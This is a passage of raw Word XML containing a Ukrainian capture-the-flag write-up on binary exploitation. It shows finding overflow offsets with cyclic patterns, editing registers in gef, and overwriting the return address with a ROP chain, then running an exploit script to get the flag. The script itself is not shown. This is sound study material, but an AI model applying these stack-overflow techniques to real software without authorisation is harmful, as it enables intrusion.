        <w:t>, що</w:t>
      </w:r>
      <w:r w:rsidR="00DD729D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA20F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:r w:rsidR="00DA20F5" w:rsidRPr="00AD67C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00DA20F5" w:rsidRPr="00AD67C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00DA20F5" w:rsidRPr="00DA20F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00DA20F5" w:rsidRPr="00AD67C4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6461616</w:t>
      </w:r>
      <w:r w:rsidR="00DA20F5" w:rsidRPr="00DA20F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789CBE05" w14:textId="210F9A98" w:rsidR="005F13E5" w:rsidRPr="005F13E5" w:rsidRDefault="005F13E5" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EAA7CF4" wp14:editId="23967E2E">
            <wp:extent cx="6645910" cy="4658360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="160917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71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B05E" w14:textId="25B14745" w:rsidR="00667072" w:rsidRDefault="00DE4AA0" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Знайдемо позицію байтів </w:t>
      </w:r>
      <w:r w:rsidR="00D970AE" w:rsidRPr="00DA20F5">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00D970AE" w:rsidRPr="00DA20F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00D970AE" w:rsidRPr="00DA20F5">
        <w:t>6461616</w:t>
      </w:r>
      <w:r w:rsidR="00D970AE" w:rsidRPr="00DA20F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00D970AE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>в послідовності:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A5DC95" w14:textId="77777777" w:rsidR="00DE4AA0" w:rsidRPr="00DE4AA0" w:rsidRDefault="00DE4AA0" w:rsidP="00DE4A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DE4AA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DE4A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E4AA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_find</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4A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DE4AA0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6461616a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4AA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</w:p>
    <w:p w14:paraId="102BEE34" w14:textId="5626BDA6" w:rsidR="00DE4AA0" w:rsidRDefault="00DE4AA0" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1367BA75" w14:textId="1FC40E29" w:rsidR="00EA36A9" w:rsidRDefault="00EA36A9" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F600A18" wp14:editId="62701455">
            <wp:extent cx="4495238" cy="657143"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="13477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0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187" w14:textId="6083798E" w:rsidR="0049726A" w:rsidRDefault="00325DC9" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Отже, 336 – розм</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ір буфера, який треба переповнити. Саме після 336 довільних байтів, повинне йти значеня </w:t>
      </w:r>
      <w:r w:rsidRPr="00325DC9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1137, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">щоб задовільнити умову </w:t>
      </w:r>
      <w:r w:rsidRPr="0049726A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00325DC9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00325DC9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0049726A" w:rsidRPr="0049726A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="0049726A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="0049726A" w:rsidRPr="0049726A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>539</w:t>
      </w:r>
      <w:r w:rsidRPr="00325DC9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="0049726A" w:rsidRPr="0049726A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B585B7" w14:textId="77777777" w:rsidR="0049726A" w:rsidRDefault="0049726A" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA40C5F" w14:textId="507B1162" w:rsidR="003361D6" w:rsidRPr="003361D6" w:rsidRDefault="003361D6" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Змінюємо значення </w:t>
      </w:r>
      <w:r w:rsidR="00F9276C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ax</w:t>
      </w:r>
      <w:r w:rsidRPr="000355B0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00F9276C" w:rsidRPr="000355B0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9276C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1337</w:t>
      </w:r>
      <w:r w:rsidR="008365E4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> і продовжуємо викона</w:t>
      </w:r>
      <w:r w:rsidR="00F16E8F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidR="008365E4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ня:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06175D3F" w14:textId="36D2228C" w:rsidR="004F0649" w:rsidRDefault="00FA782B" w:rsidP="001D731D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA782B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>gef</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA782B">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA782B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>set $</w:t>
      </w:r>
      <w:r w:rsidR="003361D6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA782B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ax=1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC47629" w14:textId="77777777" w:rsidR="007302A4" w:rsidRDefault="00D005F6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D005F6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>gef</w:t>
      </w:r>
      <w:r w:rsidRPr="00D005F6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00D005F6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325C6B02" w14:textId="225EE21A" w:rsidR="007C061F" w:rsidRPr="00FC45F4" w:rsidRDefault="00474002">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Другий</w:t>
      </w:r>
      <w:r w:rsidR="007C061F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> брейкпоінт. Бачимо, що </w:t>
      </w:r>
      <w:r w:rsidR="007C061F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00493BB3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sp</w:t>
      </w:r>
      <w:r w:rsidR="007C061F" w:rsidRPr="007C061F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00FC45F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"saaq"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADD253B" w14:textId="1DE08D0E" w:rsidR="00B6181B" w:rsidRDefault="00680B1F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A90082F" wp14:editId="2EC8D802">
            <wp:extent cx="6645910" cy="5038725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="22792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01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F0E" w14:textId="77777777" w:rsidR="007013AE" w:rsidRDefault="007013AE" w:rsidP="00A32D5F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D30611" w14:textId="2562C225" w:rsidR="00A32D5F" w:rsidRPr="00463CB6" w:rsidRDefault="00A32D5F" w:rsidP="00A32D5F">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Знайдемо позицію байтів </w:t>
      </w:r>
      <w:r w:rsidR="00AE3AA3" w:rsidRPr="00AE3AA3">
        <w:t>"saaq"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в послідовності:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FC6DA8" w14:textId="06042C5A" w:rsidR="00463CB6" w:rsidRPr="006A0268" w:rsidRDefault="00463CB6" w:rsidP="006A026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463CB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463C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63CB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_find</w:t>
      </w:r>
      <w:r w:rsidRPr="00463C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63CB6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6461616a</w:t>
      </w:r>
      <w:r w:rsidRPr="00463C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</w:p>
    <w:p w14:paraId="633A621E" w14:textId="1A285B96" w:rsidR="00A32D5F" w:rsidRPr="00A32D5F" w:rsidRDefault="00FD7221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94E3F38" wp14:editId="69DC03E2">
            <wp:extent cx="4780952" cy="704762"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="146938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83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9791" w14:textId="32A19430" w:rsidR="00950A00" w:rsidRDefault="00E5413B" w:rsidP="00E5413B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Саме після </w:t>
      </w:r>
      <w:r w:rsidR="008A11CC" w:rsidRPr="008A11CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1672 </w:t>
      </w:r>
      <w:r w:rsidR="008A11CC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>байтів повинен йти</w:t>
      </w:r>
      <w:r w:rsidR="007D23A9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D23A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r w:rsidR="007D23A9" w:rsidRPr="007D23A9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D23A9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ланцюжок.</w:t>
      </w:r>
      <w:r w:rsidR="00D808C2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Інструкція </w:t>
      </w:r>
      <w:r w:rsidR="00D808C2" w:rsidRPr="00D808C2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00D808C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidR="00D808C2" w:rsidRPr="00D808C2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidR="003E3636">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>означає</w:t>
      </w:r>
      <w:r w:rsidR="00D808C2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D808C2" w:rsidRPr="00D808C2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00D808C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidR="00D808C2" w:rsidRPr="00D808C2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D808C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r w:rsidR="00D808C2" w:rsidRPr="00D808C2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="00D808C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidR="00D808C2" w:rsidRPr="00D808C2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B3CC2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rip</w:t>
      </w:r>
      <w:r w:rsidR="00D808C2" w:rsidRPr="00D808C2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00E20C5E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Тобто </w:t>
      </w:r>
      <w:r w:rsidR="00003563" w:rsidRPr="00003563">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00E20C5E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidR="00003563" w:rsidRPr="00003563">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00E20C5E" w:rsidRPr="00DF600D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF600D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">дістає адресу поверення зі стека і переходить за нею. </w:t>
      </w:r>
      <w:r w:rsidR="00453B33">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Отже, адресу повернення треба перезаписати </w:t>
      </w:r>
      <w:r w:rsidR="00453B33">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r w:rsidR="00453B33" w:rsidRPr="007D23A9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00453B33">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ланцюж</w:t>
      </w:r>
      <w:r w:rsidR="00453B33">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ком.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F31202" w14:textId="77777777" w:rsidR="00B6318C" w:rsidRDefault="00B6318C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10AC9BDD" w14:textId="32F85E91" w:rsidR="002B0723" w:rsidRPr="00F0692B" w:rsidRDefault="002B0723">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Отже, тепер запустимо</w:t>
      </w:r>
      <w:r w:rsidR="00936C17" w:rsidRPr="00F0692B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00936C17">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>експлойт</w:t>
      </w:r>
      <w:r w:rsidR="00022568">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> без дебагера</w:t>
      </w:r>
      <w:r w:rsidR="00AD6074" w:rsidRPr="00F0692B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA7A09E" w14:textId="77777777" w:rsidR="00A14282" w:rsidRPr="00A14282" w:rsidRDefault="00A14282" w:rsidP="00A1428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1428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A1428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42F271E2" w14:textId="657A018A" w:rsidR="007C2B94" w:rsidRPr="007C2B94" w:rsidRDefault="007C2B94">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2B94">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 pwn_64.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC0126D" w14:textId="2B8EF664" w:rsidR="00B71E4F" w:rsidRDefault="00F0692B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="268F1BF8" wp14:editId="57BAD483">
            <wp:extent cx="6645910" cy="548005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="132802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29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A5EC" w14:textId="1495680D" w:rsidR="00B6318C" w:rsidRPr="00B80DD1" w:rsidRDefault="000B78AA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Бачимо прапор.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3424174A" w14:textId="77777777" w:rsidR="00542AD9" w:rsidRPr="00EE58CB" w:rsidRDefault="00542AD9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A59A013" w14:textId="77777777" w:rsidR="00A07B5B" w:rsidRDefault="00A07B5B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE32D16" w14:textId="77777777" w:rsidR="00027ADD" w:rsidRPr="00027ADD" w:rsidRDefault="00027ADD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED064E3" w14:textId="77777777" w:rsidR="00A07B5B" w:rsidRDefault="00A07B5B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4860222E" w14:textId="232326BD" w:rsidR="007E40B8" w:rsidRDefault="007E40B8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1691E91E" w14:textId="639FFFDF" w:rsidR="00A07B5B" w:rsidRDefault="007043E4" w:rsidP="00A7072A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>32-bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1D0AAD" w14:textId="77777777" w:rsidR="00A975B5" w:rsidRDefault="00A975B5" w:rsidP="00A975B5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Визначимо формат та розрядність виконуваного файлу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131AB9E7" w14:textId="57ACE81D" w:rsidR="007043E4" w:rsidRDefault="00875D43">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F518EFB" wp14:editId="64427F2E">
            <wp:extent cx="6645910" cy="2670175"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1043801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01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E87B" w14:textId="77777777" w:rsidR="00A975B5" w:rsidRPr="00A975B5" w:rsidRDefault="00A975B5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B3B5900" w14:textId="77777777" w:rsidR="009D5256" w:rsidRPr="001038DA" w:rsidRDefault="009D5256" w:rsidP="009D5256">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустимо програму і побачимо рядок </w:t>
      </w:r>
      <w:r w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"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Neo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023506E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>та очікування вводу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED203C0" w14:textId="48E61541" w:rsidR="009D5256" w:rsidRPr="001038DA" w:rsidRDefault="00356FBA" w:rsidP="009D5256">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DCA4C29" wp14:editId="5ECAFF07">
            <wp:extent cx="6645910" cy="681990"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="114932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20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EA23" w14:textId="77777777" w:rsidR="009D5256" w:rsidRPr="00607A2E" w:rsidRDefault="009D5256" w:rsidP="009D5256"/>
    <w:p w14:paraId="0AB137A1" w14:textId="77777777" w:rsidR="009D5256" w:rsidRDefault="009D5256" w:rsidP="009D5256">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Дизасемблюємо програму в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidRPr="0023506E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>та знайдемо цей рядок:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D394F8" w14:textId="2E947306" w:rsidR="007043E4" w:rsidRPr="009D5256" w:rsidRDefault="00D724FD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="100D6694" wp14:editId="3977DF3B">
            <wp:extent cx="6645910" cy="3785870"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="187417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70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ABF" w14:textId="77777777" w:rsidR="007043E4" w:rsidRPr="00A975B5" w:rsidRDefault="007043E4"/>
    <w:p w14:paraId="7ABDA6D6" w14:textId="77777777" w:rsidR="009A58BB" w:rsidRDefault="009A58BB" w:rsidP="009A58BB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00221DB7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Бачимо структуру ф. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
